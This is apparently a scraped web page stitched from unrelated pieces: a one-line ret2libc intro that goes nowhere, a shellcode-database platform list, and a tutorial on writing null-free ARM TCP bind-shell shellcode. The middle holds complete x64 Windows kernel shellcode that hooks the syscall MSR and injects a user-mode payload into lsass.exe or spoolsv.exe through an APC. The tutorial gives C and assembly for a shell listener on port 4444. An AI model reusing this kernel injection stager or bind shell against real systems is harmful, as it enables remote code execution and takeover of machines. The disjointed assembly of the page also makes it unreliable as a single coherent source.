Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcodes database

AIX


Alpha


BSD


Cisco


Sco


FreeBSD

Intel x86-64

Intel x86


Hp-Ux


Irix


Linux

ARM

Strong ARM

Super-H

MIPS

PPC

Sparc

CRISv32

Intel x86-64

Intel x86


NetBSD


OpenBSD


OSX

PPC

Intel x86-64

Intel x86


Solaris

MIPS

SPARC

Intel x86


Windows

Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of system process.
If userland shellcode causes any exception, the system process get killed.
On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
get call because system call is called on other processors.
The shellcode do not allocate shadow stack if possible for minimal shellcode size.
It is ok because some Windows function does not require shadow stack.
Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
The userland payload MUST be appened to this shellcode.

Reference:
http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

ASM code:

BITS 64
ORG 0


PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
PSGETPROCESSID_HASH    EQU    0x170114e1
PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
PSGETTHREADTEB_HASH    EQU    0xcef84c3e
KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
PSGETPROCESSPEB_HASH    EQU    0xb818b848
CREATETHREAD_HASH    EQU    0x835e515e



DATA_PEB_ADDR_OFFSET        EQU -0x10
DATA_QUEUEING_KAPC_OFFSET   EQU -0x8
DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
DATA_NT_KERNEL_ADDR_OFFSET  EQU 0x8
DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start

shellcode_start:

setup_syscall_hook:
    ; IRQL is DISPATCH_LEVEL when got code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
%endif
    
    push rbp
    
    call set_rbp_data_address_fn
    
    ; read current syscall
    mov ecx, 0xc0000082
    rdmsr
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

_hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    wrmsr
    
_setup_syscall_hook_done:
    pop rbp
    
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax
%endif
    ret

;========================================================================
; Find memory address in HAL heap for using as data area
; Return: rbp = data address
;========================================================================
set_rbp_data_address_fn:
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
_set_rbp_data_address_fn_next:
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too
    ret


syscall_hook:
    swapgs
    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    
    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli
    
_syscall_hook_done:
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax
    ret

r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ;======================================
    ; find nt kernel address
    ;======================================
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

_x64_find_nt_walk_page:
    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ;======================================
    ; get current EPROCESS and ETHREAD
    ;======================================
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    mov edi, PSGETCURRENTPROCESS_HASH
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    
    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov edi, PSGETPROCESSIMAGEFILENAME_HASH
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename


    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
%else
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
_find_eprocess_threadlist_offset_win7:
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
%endif

    
    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
%else
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
%endif
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
_find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
%endif
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)


    ;======================================
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov edi, PSGETPROCESSID_HASH
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
    

    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
    ;======================================
    ; check process name
_find_target_process_loop:
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
%endif
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop


found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ;======================================
    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov edi, PSGETPROCESSPEB_HASH
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    
    
    ;======================================
    ; iterate ThreadList until KeInsertQueueApc() success
    ;======================================
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
%else
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
    mov rbx, rsi    ; use rbx for iterating thread
%endif


    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
    ; try queueing APC then check KAPC member is more reliable.

_insert_queue_apc_loop:
    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
    mov rbx, [rbx+8]
%ifndef COMPACT
    cmp rsi, rbx
    je _insert_queue_apc_loop   ; skip list head
%endif

    ; find start of ETHREAD address
    ; set it to rdx to be used for KeInitializeApc() argument too
    lea rdx, [rbx + r14]    ; ETHREAD
    
    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
    ; Teb member is next to Queue member.
    mov edi, PSGETTHREADTEB_HASH
    call get_proc_addr
    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
    je _insert_queue_apc_loop
    
    ; KeInitializeApc(PKAPC,
    ;                 PKTHREAD,
    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
    ;                 PKRUNDOWN_ROUTINE = NULL,
    ;                 PKNORMAL_ROUTINE = userland_shellcode,
    ;                 KPROCESSOR_MODE = UserMode (1),
    ;                 PVOID Context);
    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
    xor r8, r8      ; OriginalApcEnvironment
    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
    push rbp    ; context
    push 1      ; UserMode
    push rbp    ; userland shellcode (MUST NOT be NULL)
    push r8     ; NULL
    sub rsp, 0x20   ; shadow stack
    mov edi, KEINITIALIZEAPC_HASH
    call win_api_direct
    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later

    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
    ;   SystemArgument1 is second argument in usermode code (rdx)
    ;   SystemArgument2 is third argument in usermode code (r8)
    lea rcx, [rbp+DATA_KAPC_OFFSET]
    ;xor edx, edx   ; no need to set it here
    ;xor r8, r8     ; no need to set it here
    xor r9, r9
    mov edi, KEINSERTQUEUEAPC_HASH
    call win_api_direct
    add rsp, 0x40
    ; if insertion failed, try next thread
    test eax, eax
    jz _insert_queue_apc_loop
    
    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
    ; EPROCESS pointer 8 bytes
    ; InProgressFlags 1 byte
    ; KernelApcPending 1 byte
    ; if success, UserApcPending MUST be 1
    cmp byte [rax+0x1a], 1
    je _insert_queue_apc_done
    
    ; manual remove list without lock
    mov [rax], rax
    mov [rax+8], rax
    jmp _insert_queue_apc_loop

_insert_queue_apc_done:
    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.

_r3_to_r0_done:
    pop rax
    pop rbx
    pop rsi
    pop rdi
    pop r14
    pop r15
    ret

;========================================================================
; Call function in specific module
; 
; All function arguments are passed as calling normal function with extra register arguments
; Extra Arguments: r15 = module pointer
;                  edi = hash of target function name
;========================================================================
win_api_direct:
    call get_proc_addr
    jmp rax


;========================================================================
; Get function address in specific module
; 
; Arguments: r15 = module pointer
;            edi = hash of target function name
; Return: eax = offset
;========================================================================
get_proc_addr:
    ; Save registers
    push rbx
    push rcx
    push rsi                ; for using calc_hash

    ; use rax to find EAT
    mov eax, dword [r15+60]  ; Get PE header e_lfanew
    mov eax, dword [r15+rax+136] ; Get export tables RVA

    add rax, r15
    push rax                 ; save EAT

    mov ecx, dword [rax+24]  ; NumberOfFunctions
    mov ebx, dword [rax+32]  ; FunctionNames
    add rbx, r15

_get_proc_addr_get_next_func:
    ; When we reach the start of the EAT (we search backwards), we hang or crash
    dec ecx                     ; decrement NumberOfFunctions
    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
    add rsi, r15                ; Add the modules base address

    call calc_hash

    cmp eax, edi                        ; Compare the hashes
    jnz _get_proc_addr_get_next_func    ; try the next function

_get_proc_addr_finish:
    pop rax                     ; restore EAT
    mov ebx, dword [rax+36]
    add rbx, r15                ; ordinate table virtual address
    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
    mov ebx, dword [rax+28]     ; Get the function addresses table rva
    add rbx, r15                ; Add the modules base address
    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
    add rax, r15                ; Add the modules base address to get the functions actual VA

    pop rsi
    pop rcx
    pop rbx
    ret

;========================================================================
; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
; 
; Argument: rsi = string to hash
; Clobber: rsi
; Return: eax = hash
;========================================================================
calc_hash:
    push rdx
    xor eax, eax
    cdq
_calc_hash_loop:
    lodsb                   ; Read in the next byte of the ASCII string
    ror edx, 13             ; Rotate right our hash value
    add edx, eax            ; Add the next byte of the string
    test eax, eax           ; Stop when found NULL
    jne _calc_hash_loop
    xchg edx, eax
    pop rdx
    ret


; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
; Moreover, there is no lock when calling KernelApcRoutine.
; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
;
; VOID KernelApcRoutine(
;           IN PKAPC Apc,
;           IN PKNORMAL_ROUTINE *NormalRoutine,
;           IN PVOID *NormalContext,
;           IN PVOID *SystemArgument1,
;           IN PVOID *SystemArgument2)
kernel_kapc_routine:
    push rbp
    push rbx
    push rdi
    push rsi
    push r15
    
    mov rbp, [r8]       ; *NormalContext is our data area pointer
        
    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
    push rdx
    pop rsi     ; mov rsi, rdx
    mov rbx, r9
    
    ;======================================
    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
    ;======================================
    xor eax, eax
    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
    ; rdx is already address of baseAddr
    mov [rdx], rax      ; baseAddr = 0
    mov ecx, eax
    not rcx             ; ProcessHandle = -1
    mov r8, rax         ; ZeroBits
    mov al, 0x40    ; eax = 0x40
    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
    push rax            ; MEM_COMMIT = 0x1000
    ; reuse r9 for address of RegionSize
    mov [r9], rax       ; RegionSize = 0x1000
    sub rsp, 0x20   ; shadow stack
    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
    call win_api_direct
    add rsp, 0x30
%ifndef COMPACT
    ; check error
    test eax, eax
    jnz _kernel_kapc_routine_exit
%endif
    
    ;======================================
    ; copy userland payload
    ;======================================
    mov rdi, [rsi]
    lea rsi, [rel userland_start]
    mov ecx, 0x600  ; fix payload size to 1536 bytes
    rep movsb
    
    ;======================================
    ; find CreateThread address (in kernel32.dll)
    ;======================================
    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
    mov rax, [rax + 0x18]       ; PEB->Ldr
    mov rax, [rax + 0x20]       ; InMemoryOrder list

%ifdef COMPACT
    mov rsi, [rax]      ; first one always be executable, skip it
    lodsq               ; skip ntdll.dll
%else
_find_kernel32_dll_loop:
    mov rax, [rax]       ; first one always be executable
    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
    ; offset 0x50  => is name
    ; offset 0x20  => is dllbase
    ;cmp word [rax+0x38], 0x40
    ;jne _find_kernel32_dll_loop
    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop
%endif

    mov r15, [rax+0x20]
    mov edi, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
    
_kernel_kapc_routine_exit:
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret

  
userland_start:
userland_start_thread:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret
    
userland_payload:

TCP Bind Shell in Assembly (ARM 32-bit)

In this tutorial, you will learn how to write TCP bind shellcode that is free of null bytes and can be used as shellcode for exploitation. When I talk about exploitation, I’m strictly referring to approved and legal vulnerability research. For those of you relatively new to software exploitation, let me tell you that this knowledge can, in fact, be used for good. If I find a software vulnerability like a stack overflow and want to test its exploitability, I need working shellcode. Not only that, I need techniques to use that shellcode in a way that it can be executed despite the security measures in place. Only then I can show the exploitability of this vulnerability and the techniques malicious attackers could be using to take advantage of security flaws.

After going through this tutorial, you will not only know how to write shellcode that binds a shell to a local port, but also how to write any shellcode for that matter. To go from bind shellcode to reverse shellcode is just about changing 1-2 functions, some parameters, but most of it is the same. Writing a bind or reverse shell is more difficult than creating a simple execve() shell. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:

Before we start, I’d like to remind you that we’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?

UNDERSTANDING THE DETAILS

First of all, what is a bind shell and how does it really work? With a bind shell, you open up a communication port or a listener on the target machine. The listener then waits for an incoming connection, you connect to it, the listener accepts the connection and gives you shell access to the target system.

This is different from how Reverse Shells work. With a reverse shell, you make the target machine communicate back to your machine. In that case, your machine has a listener port on which it receives the connection back from the target system.

 

Both types of shell have their advantages and disadvantages depending on the target environment. It is, for example, more common that the firewall of the target network fails to block outgoing connections than incoming. This means that your bind shell would bind a port on the target system, but since incoming connections are blocked, you wouldn’t be able to connect to it. Therefore, in some scenarios, it is better to have a reverse shell that can take advantage of firewall misconfigurations that allow outgoing connections. If you know how to write a bind shell, you know how to write a reverse shell. There are only a couple of changes necessary to transform your assembly code into a reverse shell once you understand how it is done.

To translate the functionalities of a bind shell into assembly, we first need to get familiar with the process of a bind shell:

  1. Create a new TCP socket
  2. Bind socket to a local port
  3. Listen for incoming connections
  4. Accept incoming connection
  5. Redirect STDIN, STDOUT and STDERR to a newly created socket from a client
  6. Spawn the shell

This is the C code we will use for our translation.

#include <stdio.h> 
#include <sys/types.h>  
#include <sys/socket.h> 
#include <netinet/in.h> 

int host_sockid;    // socket file descriptor 
int client_sockid;  // client file descriptor 

struct sockaddr_in hostaddr;            // server aka listen address

int main() 
{ 
    // Create new TCP socket 
    host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

    // Initialize sockaddr struct to bind socket using it 
    hostaddr.sin_family = AF_INET;                  // server socket type address family = internet protocol address
    hostaddr.sin_port = htons(4444);                // server port, converted to network byte order
    hostaddr.sin_addr.s_addr = htonl(INADDR_ANY);   // listen to any address, converted to network byte order

    // Bind socket to IP/Port in sockaddr struct 
    bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); 

    // Listen for incoming connections 
    listen(host_sockid, 2); 

    // Accept incoming connection 
    client_sockid = accept(host_sockid, NULL, NULL); 

    // Duplicate file descriptors for STDIN, STDOUT and STDERR 
    dup2(client_sockid, 0); 
    dup2(client_sockid, 1); 
    dup2(client_sockid, 2); 

    // Execute /bin/sh 
    execve("/bin/sh", NULL, NULL); 
    close(host_sockid); 

    return 0; 
}
STAGE ONE: SYSTEM FUNCTIONS AND THEIR PARAMETERS

The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, bind, listen, accept, dup2, execve. You can figure out the system call numbers of these functions with the following command:

pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
#define __NR_socketcall             (__NR_SYSCALL_BASE+102)
#define __NR_socket                 (__NR_SYSCALL_BASE+281)
#define __NR_socketpair             (__NR_SYSCALL_BASE+288)
#undef __NR_socketcall

If you’re wondering about the value of _NR_SYSCALL_BASE, it’s 0:

root@raspberrypi:/home/pi# grep -R "__NR_SYSCALL_BASE" /usr/include/arm-linux-gnueabihf/asm/
/usr/include/arm-linux-gnueabihf/asm/unistd.h:#define __NR_SYSCALL_BASE 0

These are all the syscall numbers we’ll need:

#define __NR_socket    (__NR_SYSCALL_BASE+281)
#define __NR_bind      (__NR_SYSCALL_BASE+282)
#define __NR_listen    (__NR_SYSCALL_BASE+284)
#define __NR_accept    (__NR_SYSCALL_BASE+285)
#define __NR_dup2      (__NR_SYSCALL_BASE+ 63)
#define __NR_execve    (__NR_SYSCALL_BASE+ 11)

The parameters each function expects can be looked up in the linux man pages, or on w3challs.com.

The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful bind shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux Kernel. Let’s use strace to test the C version of our bind shell. To reduce the noise, we limit the output to the functions we’re interested in.

Terminal 1:
pi@raspberrypi:~/bindshell $ gcc bind_test.c -o bind_test
pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
Terminal 2:
pi@raspberrypi:~ $ netstat -tlpn
Proto Recv-Q  Send-Q  Local Address  Foreign Address  State     PID/Program name
tcp    0      0       0.0.0.0:22     0.0.0.0:*        LISTEN    - 
tcp    0      0       0.0.0.0:4444   0.0.0.0:*        LISTEN    1058/bind_test 
pi@raspberrypi:~ $ netcat -nv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!

This is our strace output:

pi@raspberrypi:~/bindshell $ strace -e execve,socket,bind,listen,accept,dup2 ./bind_test
execve("./bind_test", ["./bind_test"], [/* 49 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 2) = 0
accept(3, 0, NULL) = 4
dup2(4, 0) = 0
dup2(4, 1) = 1
dup2(4, 2) = 2
execve("/bin/sh", [0], [/* 0 vars */]) = 0

Now we can fill in the gaps and note down the values we’ll need to pass to the functions of our assembly bind shell.

STAGE TWO: STEP BY STEP TRANSLATION

In the first stage, we answered the following questions to get everything we need for our assembly program:

  1. Which functions do I need?
  2. What are the system call numbers of these functions?
  3. What are the parameters of these functions?
  4. What are the values of these parameters?

This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:

  1. Map out which register you want to use for which parameter
  2. Figure out how to pass the required values to these registers
    1. How to pass an immediate value to a register
    2. How to nullify a register without directly moving a #0 into it (we need to avoid null-bytes in our code and must therefore find other ways to nullify a register or a value in memory)
    3. How to make a register point to a region in memory which stores constants and strings
  3. Use the right system call number to invoke the function and keep track of register content changes
    1. Keep in mind that the result of a system call will land in r0, which means that in case you need to reuse the result of that function in another function, you need to save it into another register before invoking the function.
    2. Example: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), and should therefore be preserved in another register.

0 – Switch to Thumb Mode

The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.

.section .text
.global _start
_start:
    .ARM
    add     r3, pc, #1            
    bx      r3

From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.

1 – Create new Socket

 

These are the values we need for the socket call parameters:

root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0,                               // Dummy protocol for TCP 
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1,  // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2       // IP protocol family. 
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET

After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.

In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).

To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81

Final code snippet:

    .THUMB
    mov     r0, #2
    mov     r1, #1
    sub     r2, r2, r2
    mov     r7, #200
    add     r7, #81                // r7 = 281 (socket syscall number) 
    svc     #1                     // r0 = host_sockid value 
    mov     r4, r0                 // save host_sockid in r4

2 – Bind Socket to Local Port

 

With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:

// bind(r0, &sockaddr, 16)
 adr r1, struct_addr    // pointer to address, port
 [...]
struct_addr:
.ascii "\x02\xff"       // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"       // port number 4444 
.byte 1,1,1,1           // IP Address

The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.

In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.

Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.

 

